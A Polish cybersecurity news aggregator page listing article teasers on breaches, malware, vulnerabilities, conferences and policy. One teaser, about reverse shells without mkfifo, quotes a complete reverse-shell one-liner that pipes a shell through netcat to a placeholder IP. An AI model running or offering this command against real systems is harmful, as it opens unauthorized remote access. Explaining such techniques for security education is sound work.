Serwisy SEC

#CyberMagazyn: Trening cyberbezpieczeństwa skrojony na miarę

#CyberMagazyn: Trening cyberbezpieczeństwa skrojon...

cyberdefence24.pl 7 miesięcy temu Zapewnienie **zaawansowanej ochrony systemów oraz wypracowanie solidnej strategii [cyberbezpieczeństwa**](https://cyberdefence24.pl/cyberbezpieczenstwo/cybermagazyn-zdrowie-psychiczne-wyzwania-w-pracy-w-cyberbezpieczenstwie) są w tej chwili najważnie...
Reverse shell bez mkfifo

Reverse shell bez mkfifo

nfsec.pl 7 miesięcy temu J eśli kiedykolwiek próbowaliśmy stworzyć reverse shell, czy to dzięki telnet, czy OpenSSL – prawdopodobnie miały one wspólny układ: mkfifo /tmp/f; nc 1.2.3.4 31337 </tmp/f | sh >/tmp/f; rm /tmp/f Na początku tworzony jest nazwany potok FIFO za...
15 000 razy pobrano fałszywy pakiet Pythona

15 000 razy pobrano fałszywy pakiet Pythona

bulldogjob.pl 7 miesięcy temu Pakiety generowane przez sztuczną inteligencję mogą być w rzeczywistości złośliwym oprogramowaniem. Sfabrykowany huggingface-cli dla Pythona pobrano aż 15 000 razy.Pusty pakiet został pobrany 15 000 razy, bo AI zmyśliło taką nazwę i uporczywie podpow...
Błąd Facebooka. Sam rozsyłał zaproszenia

Błąd Facebooka. Sam rozsyłał zaproszenia

cyberdefence24.pl 7 miesięcy temu Od 16 lutego do 24 marca Facebook sam wysyłał zaproszenia. [Meta](https://cyberdefence24.pl/biznes-i-finanse/trzesienie-ziemi-w-mecie-firma-traci-istotnego-eksperta) zaleca przejrzenie dziennika aktywności i sprawdzenie, czy padliśmy ofiarą tego błęd...
Jak powinniśmy rozumieć bezpieczeństwo aplikacji korporacyjnych?

Jak powinniśmy rozumieć bezpieczeństwo aplikacji k...

kapitanhack.pl 7 miesięcy temu Każda organizacja opracowująca czy wdrażająca aplikacje w swoim środowisku musi posiadać mechanizmy kontroli ich bezpieczeństwa. Jednakże przedsiębiorstwa stoją przed pewnymi...
Jak adekwatnie rozmieścić kamery wokół domu?

Jak adekwatnie rozmieścić kamery wokół domu?

politykabezpieczenstwa.pl 7 miesięcy temu Jakie są podstawowe kroki do zapewnienia optymalnego bezpieczeństwa domu poprzez rozmieszczenie kamer? Co należy wziąć pod uwagę, decydując o lokalizacji kamer? Jakie są najlepsze praktyki, aby zminimalizować martwe pola i zapewnić wysoką jakość obra...
Aplikacja mObywatel wprowadza ePłatności

Aplikacja mObywatel wprowadza ePłatności

politykabezpieczenstwa.pl 7 miesięcy temu Koleje nowości w aplikacji mObywatel. Tym razem uruchomiono opcję ePłatności. Dzięki tej funkcji można opłacić na przykład podatki. Uwaga, nowe możliwość nie jest jednak dostępna dla wszystkich!
Administracja serwerami — zalety modelu outsourcingowego

Administracja serwerami — zalety modelu outsourcin...

itcontent.eu 7 miesięcy temu Administracja serwerami – zalety modelu outsourcingowego Outsourcing administracji serwerami oferuje firmom elastyczność, umożliwiając im skoncentrowanie się na kluczowych aspektach ich...
18 sesja linuksowa

18 sesja linuksowa

programistamag.pl 7 miesięcy temu Sesja linuksowa to największa w Polsce darmowa konferencja poświęcona rozwiązaniom Open Source oraz najnowszym trendom w systemach rodziny GNU/Linux organizowana przez studentów z Akademickiego Stowarzyszenia Informatycznego (https://www.facebook.com...
Nie zaszyfrowali systemu, za to wykradli dane. Kolejny atak w USA

Nie zaszyfrowali systemu, za to wykradli dane. Kol...

cyberdefence24.pl 7 miesięcy temu Doniesienia o [atakach hakerskich](https://cyberdefence24.pl/cyberbezpieczenstwo/ataki-hakerskie-jaka-jest-swiadomosc-polakow) w krajach anglojęzycznych **są w ostatnim czasie dość częste**. Jednak takich przypadków mówiących o _jedynie częściowym su...
Social media a samobójstwa wśród młodzieży. Posypały się pozwy

Social media a samobójstwa wśród młodzieży. Posypa...

cyberdefence24.pl 7 miesięcy temu Pozwy zostały wystosowane wobec **Mety, Snapchata, ByteDance – właściciela TikToka oraz firmy Alphabet, która zarządza YouTube i Google**.
Europejskie firmy krytykują złagodzone zasady przetargów na kontrakty w chmurze w UE

Europejskie firmy krytykują złagodzone zasady prze...

itreseller.com.pl 7 miesięcy temu Deutsche Telekom, Orange, Airbus i 15 innych europejskich firm skrytykowało najnowszy projekt unijnego systemu certyfikacji cyberbezpieczeństwa (CCS), który ich zdaniem ułatwi hiperskalerom ubieganie się o unijne kontrakty na przetwarzanie w chmurze....
SECURE 2024. Nowa zimna wojna, bezpieczna AI, szanse i zagrożenia w cyberprzestrzeni

SECURE 2024. Nowa zimna wojna, bezpieczna AI, szan...

cyberdefence24.pl 7 miesięcy temu **Patronat medialny**
14 lat temu udostępnił w sieci tajne dokumenty USA. Teraz może wyjść na wolność

14 lat temu udostępnił w sieci tajne dokumenty USA...

instalki.pl 7 miesięcy temu Joe Biden ogłosił, iż rozważa prośbę Australii o porzucenie długotrwałych, amerykańskich wysiłków na rzecz ścigania Juliana Assange’a, założyciela WikiLeaks. Assange przed laty ujawnił w sieci liczne, poufne informacje pochodzące z rządowych dokument...
Wyciek w Microsoft. Wpadka giganta

Wyciek w Microsoft. Wpadka giganta

cyberdefence24.pl 7 miesięcy temu [TechCrunch](https://techcrunch.com/2024/04/09/microsoft-employees-exposed-internal-passwords-security-lapse/) we wtorek poinformował, iż **wrażliwe dane Microsoftu były do pobrania w internecie.** Co najgorsze, zasób, z którego pobierano dane **był ...
Jak hakerzy ze wschodu przed wyborami ekrany w centrum handlowym zhakowali

Jak hakerzy ze wschodu przed wyborami ekrany w cen...

zaufanatrzeciastrona.pl 7 miesięcy temu Nasi wschodni sąsiedzi od dawna próbują wywierać wpływ na polską politykę dzięki kampanii dezinformacyjnych. Znamy zhakowane konta w mediach społecznościowych czy skrzynki pocztowe polityków, ale zhakowane ekrany w centrum handlowym to coś nowego. Ki...
Akcja pirotechników SG na lotnisku Warszawa-Modlin

Akcja pirotechników SG na lotnisku Warszawa-Modlin...

security-ops.pl 7 miesięcy temu W dniu 10 kwietnia 2024 roku funkcjonariusze z Interwencyjnego Zespołu Minersko – Pirotechnicznego Placówki Straży Granicznej Warszawa-Modlin otrzymali informację o porzuconej na antresoli terminala reklamówce z niewidoczną zawartością. Po sprawdzeni...
Check Point: „28% wzrost cyberataków na świecie” rok do roku (Q1 2024)

Check Point: „28% wzrost cyberataków na świecie” r...

avlab.pl 7 miesięcy temu 28-procentowy wzrost ataków oraz koncentracja cyberprzestępców na nauce i badaniach oraz sektorze administracyjno-wojskowym – tak wyglądał pierwszy kwartał 2024 roku w cyberprzestrzeni według ekspertów Check Point Research. Firma ostrzega przed szerz...
Pierwsza wersja „Global Digital Compact” opublikowana

Pierwsza wersja „Global Digital Compact” opublikow...

politykabezpieczenstwa.pl 7 miesięcy temu „Naszym celem jest włączająca, otwarta, bezpieczna i chroniona przyszłość cyfrowa dla wszystkich” – czytamy w ogólnoświatowym porozumieniu cyfrowym Global Digital Compact (GDC), które opublikowało Biuro Pełnomocnika ds. Technologii ONZ.
UWAGA! CISA wydaje zalecenia w celu minimalizacji ryzyka ataku LOtL na organizacje

UWAGA! CISA wydaje zalecenia w celu minimalizacji ...

kapitanhack.pl 7 miesięcy temu Taktyka oraz narzędzia Living Off the Land (LOtL) cieszą się coraz większym zainteresowaniem wśród cyberprzestępców, w tym podmiotów sponsorowanych przez...
CEECloud Services Distribution (Grupa Bakotech) ogłasza nawiązanie współpracy z Kaseya

CEECloud Services Distribution (Grupa Bakotech) og...

itreseller.com.pl 7 miesięcy temu Na początku kwietnia CEEcloud, spółka należąca do Grupy Bakotech, ogłosiła podpisanie kontraktu z firmą Kaseya – od wielu lat uznawaną za lidera w obszarze kompleksowych rozwiązań IT. To kolejny, bardzo istotny krok dla dystrybutora, podkreślający je...
Nowe narzędzia AI od Google. Tego jeszcze nie było

Nowe narzędzia AI od Google. Tego jeszcze nie było...

cyberdefence24.pl 7 miesięcy temu Podczas konferencji Google Cloud Next 2024 w Las Vegas gigant technologiczny przedstawił nowości AI – **zarówno w istniejących już narzędziach, jak i w całkowicie nowych**. Konferencja rozpoczęła się 9 kwietnia i potrwa do czwartku 11 kwietnia.
Mowa nienawiści

Mowa nienawiści

instytutcyber.pl 7 miesięcy temu Poniższe infografiki dotyczą mowy nienawiści. Poruszą one przede wszystkim tematy:
XV edycja Warszawskich Dni Informatyki. Święto branży IT

XV edycja Warszawskich Dni Informatyki. Święto bra...

cyberdefence24.pl 7 miesięcy temu **Patronat medialny**
Formularz zwrotu – gdzie musisz go zamieścić?

Formularz zwrotu – gdzie musisz go zamieścić?

legalniewsieci.pl 7 miesięcy temu Ogrom dodatkowych obowiązków, które ustawodawca nakłada na e-sklepy może przyprawić niejednego sprzedawcę o ból głowy. Czasem sensowność nowych wymagań może budzić wątpliwości. Ten, o którym mowa poniżej jest bardzo istotny, a większość sprzedawców n...
Google Cloud Days – konferencja o bezpieczeństwie, AI i automatyzacji pracy w chmurze

Google Cloud Days – konferencja o bezpieczeństwie,...

programistamag.pl 7 miesięcy temu Google Cloud Days to charytatywna konferencja budowana na praktycznym podejściu do chmury. Jej organizatorem jest partner Google Cloud – firma FOTC. Przez dwa dni warszawska siedziba Google (Warsaw HUB) stanie się miejscem wymiany myśli – dzielenia s...
Kiedy ostatnio aktualizowaliście wtyczki w WordPressie? Wykryto zagrożenie!

Kiedy ostatnio aktualizowaliście wtyczki w WordPre...

homodigital.pl 7 miesięcy temu Strony tworzone na platformie WordPress są stronami bezpiecznymi. Ale jednak pod warunkiem, iż ich właściciele pamiętają o aktualizacji wtyczek. Badacz cyberbezpieczeństwa, AmrAwad, wykrył niedawno kolejną podatność: krytyczną lukę we wtyczce LayerSl...
Wojsko RP. Kolejne porozumienie DKWOC

Wojsko RP. Kolejne porozumienie DKWOC

cyberdefence24.pl 7 miesięcy temu **[Dowództwo Komponentu Wojsk Obrony Cyberprzestrzeni](https://www.wojsko-polskie.pl/woc/) (DKWOC), strzegące bezpieczeństwa Polski w sieci, będzie bliżej współpracowało z [Centralnym Ośrodkiem Informatyki](https://www.coi.gov.pl/o-nas)**. Mówimy o w...
Atos poszukuje 600 mln euro w gotówce w ramach planu refinansowania

Atos poszukuje 600 mln euro w gotówce w ramach pla...

itreseller.com.pl 7 miesięcy temu Francuska firma konsultingowa Atos musi zebrać 600 milionów euro (651 milionów dolarów) w gotówce, aby sfinansować swoją działalność w 2024 i 2025 roku, poinformowała we wtorek, przedstawiając swoje plany refinansowania. Gigant technologiczny, który ...
Od pliku PDF do infekcji – złośliwe oprogramowanie Byakugan

Od pliku PDF do infekcji – złośliwe oprogramowanie...

kapitanhack.pl 7 miesięcy temu W styczniu FortiGuard Labs przeanalizowało plik PDF napisany w języku portugalskim, który rozpowszechnia wielofunkcyjne złośliwe oprogramowanie znane jako Byakugan. Podczas...
Dlaczego dzwoni do mnie spam?

Dlaczego dzwoni do mnie spam?

politykabezpieczenstwa.pl 7 miesięcy temu Czy zastanawiałeś się kiedykolwiek, dlaczego otrzymujesz niechciane połączenia telefoniczne? Skąd spamerzy mają Twój numer telefonu? Jakie techniki stosują, aby skłonić Cię do odebrania połączenia? I co najważniejsze, jak możesz się przed nimi skutec...
Modele AI wektorem ataku na infrastrukturę AaaS

Modele AI wektorem ataku na infrastrukturę AaaS

sekurak.pl 7 miesięcy temu Niedawno pisaliśmy o tym, jak wykorzystanie niebezpiecznych mechanizmów serializacji może być metodą ataku na developerów. Tym razem przedstawiamy research przeprowadzony przez WIZ, który korzystając z podobnych mechanizmów umożliwia atak na infrastr...
Zmiany w Centralnym Ośrodku Informatyki. Nowa twarz z Microsoftu

Zmiany w Centralnym Ośrodku Informatyki. Nowa twar...

cyberdefence24.pl 7 miesięcy temu Postępują zmiany w instytucjach rządowych. Według informacji udostępnionych przez Annę Wittenberg, dziennikarkę z „Dziennika Gazety Prawnej” na portalu X (dawny Twitter), **[Centralny Ośrodek Informatyki](https://cyberdefence24.pl/cyberbezpieczenstwo...
Zapraszamy Was na INSECON!

Zapraszamy Was na INSECON!

cybsecurity.org 7 miesięcy temu Kongres INSECON na straży cyberbezpieczeństwa! Dzisiejsze wyzwania związane z cyberbezpieczeństwem wymagają ścisłej uwagi i zaangażowania ze strony organizacji i jednostek. W obliczu dynamicznego rozwoju technologii, cyberprzestępczość staje się cora...
Jak polskie nastolatki używają wycieków danych by dokuczać swoim rówieśnikom?

Jak polskie nastolatki używają wycieków danych by ...

niebezpiecznik.pl 7 miesięcy temu O wyciekach danych piszemy w Niebezpieczniku od 15 lat. Informowaliśmy o leakach baz danych pacjentów (i ich historii leczenia), o wyciekach wstydliwych zakupów i potężnych bazach adresów i telefonów pozyskiwanych z setek polskich sklepów internetowy...
Skrót do Map Google zniknął z wyszukiwarki?

Skrót do Map Google zniknął z wyszukiwarki?

politykabezpieczenstwa.pl 7 miesięcy temu Wyszukiwarka Google znów nas zaskakuje! Zniknął znany i lubiany skrót do Map Google. Dlaczego tak się stało? Gdzie można go znaleźć, aby móc korzystać z jednej z najbardziej znanych i lubianych funkcji nawigacji.
Co wydarzyło się w cyberbezpieczeństwie w zeszłym tygodniu

Co wydarzyło się w cyberbezpieczeństwie w zeszłym ...

kapitanhack.pl 7 miesięcy temu Kiedyś co poniedziałek publikowaliśmy zwięzłe podsumowanie wydarzeń z poprzedniego tygodnia. Zrezygnowaliśmy z tego, bo z założenia sprawdzamy informacje, które prezentujemy,...
Przestępcy działający w obszarze ataków zero-day stają się coraz bardziej zorganizowani i bezwzględni, przestrzega ekspert G DATA Software

Przestępcy działający w obszarze ataków zero-day s...

itreseller.com.pl 7 miesięcy temu Zagrożenia w internecie w obecnych czasach są, niestety, bardzo powszechne i mogą prowadzić do wielu poważnych konsekwencji. Niezależnie od tego, czy jesteśmy zwykłymi użytkownikami, małymi przedsiębiorcami, czy dużymi korporacjami, każdy z nas może ...
Czy rozpoznasz, na którym obrazku ukrył się groźny wirus? Mniej znane metody działania cyberprzestępców

Czy rozpoznasz, na którym obrazku ukrył się groźny...

itreseller.com.pl 7 miesięcy temu Chyba wszyscy już wiemy, iż niebezpieczne wirusy mogą być przesyłane do nas w mailach, w formie załączników czy linków. Cyberprzestępcy mają jednak także inne metody. Potrafią ukryć złośliwe oprogramowanie w grafikach. Czy da się rozpoznać takie obra...
Zabezpieczanie danych przy wysyłce mailowej

Zabezpieczanie danych przy wysyłce mailowej

politykabezpieczenstwa.pl 7 miesięcy temu Badanie ClickMeeting pokazuje, iż tylko 20% użytkowników nie obawia się o swoje dane, a 41% czuje się bezpiecznie online. Wobec wszechobecnej technologii e-mail jako narzędzie do przesyłania dokumentów jest powszechny, oferując szybkość i wygodę. Mim...
Podatność w YubiKey Manager. Konieczna aktualizacja

Podatność w YubiKey Manager. Konieczna aktualizacj...

cyberdefence24.pl 7 miesięcy temu Yubico [poinformowało,](https://www.yubico.com/support/security-advisories/ysa-2024-01/) iż YubiKey Manager GUI działające z uprawieniami administratora pozwalało na **uruchomienie przeglądarki z tymi samymi uprawnieniami.** Ważne jest to, iż podatno...
Przełomowa decyzja niemieckiego landu. "Chcemy cyfrowej niezależności"

Przełomowa decyzja niemieckiego landu. "Chcemy cyf...

cyberdefence24.pl 7 miesięcy temu Dyskusje dotyczące wyższości [Windowsa](https://cyberdefence24.pl/cyberbezpieczenstwo/wazne-amerykanskie-instytucje-dzialaja-na-windowsie-xp) nad Linuxem (albo na odwrót) stały się już tradycją. Szerokie stosowanie produktów oferowanych przez ameryka...
Na co uważać przy internetowych randkach? 9 zagrożeń

Na co uważać przy internetowych randkach? 9 zagroż...

kwestiabezpieczenstwa.pl 7 miesięcy temu Poznaj 9 zagrożeń przy randkach online i sposoby na zachowanie bezpieczeństwa i prywatności. Jak bezpiecznie randkować przez internet?
Atak hakerski na popularny sklep online. DeeZee ostrzega klientów

Atak hakerski na popularny sklep online. DeeZee os...

cyberdefence24.pl 7 miesięcy temu Tym razem celem cyberprzestępców padł internetowy [sklep DeeZee](https://deezee.pl/), który w korespondencji mailowej poinformował o naruszeniu danych i konieczności zmiany hasła przez wszystkich klientów.
Meta i Google ograniczają dostęp do informacji na temat zdrowia reprodukcyjnego

Meta i Google ograniczają dostęp do informacji na ...

politykabezpieczenstwa.pl 7 miesięcy temu Meta i Google rzekomo ograniczają informacje na temat zdrowia reprodukcyjnego na swoich platformach w Afryce, Azji i Ameryce Łacińskiej.
Koleżka myślał, iż robi LABy z bezpieczeństwa webowego. A znalazł podatność path traversal jako root. W serwisie portswigger.net :-)

Koleżka myślał, iż robi LABy z bezpieczeństwa webo...

sekurak.pl 7 miesięcy temu Portswigger to producent chyba najbardziej znanego narzędzia do testowania bezpieczeństwa aplikacji webowych – Burp Suite. Za to znalezisko wypłacono $5000 w ramach bug bounty. Co my tu mamy? Opis zaczyna się dość nietypowo: Nie zamierzałem tego zgła...
Film z YouTube oferuje cracka za darmo? Prawie na pewno to malware

Film z YouTube oferuje cracka za darmo? Prawie na ...

cyberdefence24.pl 7 miesięcy temu Chociaż statystyki wskazują, iż popularność piractwa w ostatnich latach wyraźnie spadła, kultura zdobywania gier i programów dzięki niedozwolonych metod, przez cały czas funkcjonuje. Bardzo często **trzeba się wysilić**, aby odnaleźć wiarygodne [źród...
Nowy pomysł Google. Płatna wyszukiwarka oparta o AI

Nowy pomysł Google. Płatna wyszukiwarka oparta o A...

cyberdefence24.pl 7 miesięcy temu O planach giganta technologicznego czytamy w [raporcie](https://www.ft.com/content/2f4bfeb4-6579-4819-9f5f-b3a46ff59ed1) „Financial Times”. Dziennik powołuje się na „trzy dobrze poinformowane osoby związane z Google”. Nie wiadomo, kiedy nowa wyszukiw...
Korzystasz z mobilnej bankowości? BIK wie, jak posługujesz się telefonem!

Korzystasz z mobilnej bankowości? BIK wie, jak pos...

homodigital.pl 7 miesięcy temu Trzymasz telefon prosto przed sobą, a może korzystasz z niego, leżąc w łóżku? Jak gwałtownie wciskasz klawisze, gdy dokonujesz przelewu? Czy na komputerze wykonujesz chaotyczne czy uporządkowane ruchy myszką? VeloBank dołącza do grona banków stosując...
Google Cloud wesprze Ministerstwo Cyfryzacji w obszarze cyberbezpieczeństwa

Google Cloud wesprze Ministerstwo Cyfryzacji w obs...

itreseller.com.pl 7 miesięcy temu Google Cloud Poland podpisało z Ministerstwem Cyfryzacji porozumienie o współpracy w ramach Programu Współpracy w Cyberbezpieczeństwie (PWCyber). Wiceminister Paweł Olszewski wyraził przekonanie, iż podpisanie porozumienia stanowi istotny krok naprzó...

Popularne

Wieści z Darknetu 17.11.2024 #3

Wieści z Darknetu 17.11.2024 #3

5 dni temu 57
Proxmox – kompleksowe narzędzie do wirtualizacji

Proxmox – kompleksowe narzędzie do wirtualizacji

4 dni temu 52
Coś (lub ktoś) niszczy kable na dnie mórz. Międzynarodowa komunikacja odcięta

Coś (lub ktoś) niszczy kable na dnie mórz. Międzynarodowa ko...

3 dni temu 52
Zablokowane SMS-y? To nie cenzura, to CERT Polska. Zablokował już milion

Zablokowane SMS-y? To nie cenzura, to CERT Polska. Zablokowa...

5 dni temu 42
Proton Pass zaczyna Black Friday

Proton Pass zaczyna Black Friday

5 dni temu 32
English (US) English (US) · Polish (PL) Polish (PL) · Russian (RU) Russian (RU) ·
Kontakt · Regulamin · O nas ·

© Społeczność PAYLOAD 2024. Wszelkie prawa zastrzeżone.